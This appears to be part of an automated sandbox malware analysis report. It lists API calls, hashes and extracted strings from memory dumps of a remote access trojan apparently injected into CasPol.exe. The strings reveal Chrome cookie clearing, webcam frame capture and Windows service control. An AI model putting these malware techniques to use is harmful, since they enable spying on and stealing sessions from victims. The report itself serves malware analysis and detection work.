                                                                                                                                                              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                              • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                              • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteErrorFileLast
                                                                                                                                                              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                              • API String ID: 2018770650-304995407
                                                                                                                                                              • Opcode ID: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                                                                                              • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                                              • Opcode Fuzzy Hash: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                                                                                              • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                                                              Strings
                                                                                                                                                              • Rmc-GH3PRL, xrefs: 0040693F
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 00406927
                                                                                                                                                              • PFb, xrefs: 00406909
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$PFb$Rmc-GH3PRL
                                                                                                                                                              • API String ID: 0-3506147867
                                                                                                                                                              • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                                              • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                              • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                                                                                              • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                              APIs
                                                                                                                                                              • __allrem.LIBCMT ref: 00439789
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                                              • __allrem.LIBCMT ref: 004397BC
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                                              • __allrem.LIBCMT ref: 004397F1
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                              • Opcode ID: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                                                                                                              • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                                              • Opcode Fuzzy Hash: e717a979b06a6d59714d5f6060216880ad0b40e6851c78038ac3081c6fc0778a
                                                                                                                                                              • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                              • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                              • __freea.LIBCMT ref: 10008A11
                                                                                                                                                              • __freea.LIBCMT ref: 10008A36
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                              • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                              • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                              • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                              • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __cftoe
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4189289331-0
                                                                                                                                                              • Opcode ID: 20c88ef437a120485069e82cad4792bbc61779312f3e169af31805832c4ed2ab
                                                                                                                                                              • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                                              • Opcode Fuzzy Hash: 20c88ef437a120485069e82cad4792bbc61779312f3e169af31805832c4ed2ab
                                                                                                                                                              • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __freea$__alloca_probe_16
                                                                                                                                                              • String ID: a/p$am/pm
                                                                                                                                                              • API String ID: 3509577899-3206640213
                                                                                                                                                              • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                                                                              • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                                                              • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                                                                                              • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: H_prologSleep
                                                                                                                                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                                              • API String ID: 3469354165-462540288
                                                                                                                                                              • Opcode ID: 57a7d8ef4d21fa3d36b10bc336a72a06854ddbca1eee306ed405358093b4de51
                                                                                                                                                              • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                                              • Opcode Fuzzy Hash: 57a7d8ef4d21fa3d36b10bc336a72a06854ddbca1eee306ed405358093b4de51
                                                                                                                                                              • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                                              APIs
                                                                                                                                                              • _strlen.LIBCMT ref: 10001607
                                                                                                                                                              • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1922816806-0
                                                                                                                                                              • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                              • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                              • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                              • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3594823470-0
                                                                                                                                                              • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                              • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                              • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                              • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 493672254-0
                                                                                                                                                              • Opcode ID: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                                              • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                                              • Opcode Fuzzy Hash: cc75d9dcd9698d489bd16d1529218808ef0209595e5e3940521ea5438231db37
                                                                                                                                                              • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                              • Opcode ID: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                              • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                                              • Opcode Fuzzy Hash: 621d246bd99772174e6328e27007d7fc44d2e9bedb07ae0db1c9b20682e519a8
                                                                                                                                                              • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                              • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                              • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                              • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                              • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                              • _free.LIBCMT ref: 00446EF6
                                                                                                                                                              • _free.LIBCMT ref: 00446F1E
                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                              • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                              • _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                              • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                                                                              • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                                              • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                                                                                                                                                              • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                                                                              • _free.LIBCMT ref: 10005B2D
                                                                                                                                                              • _free.LIBCMT ref: 10005B55
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                                                                              • _abort.LIBCMT ref: 10005B74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4186874207.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4186834676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4186874207.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                              • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                              • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                                                                              • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                                                                              • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                              • Opcode ID: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                                                              • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                                                              • Opcode Fuzzy Hash: 8c2c12d76111034d1ffd754af595e71f441d69217dbef0b08bd463c672326562
                                                                                                                                                              • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                              • Opcode ID: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                                                              • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                                                              • Opcode Fuzzy Hash: d7e55e87c4aa5de171478471ca9946ff37ffda1a29cecfda88707176146ab33a
                                                                                                                                                              • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DAA
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DB7
                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DC6
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DD8
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419DDB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
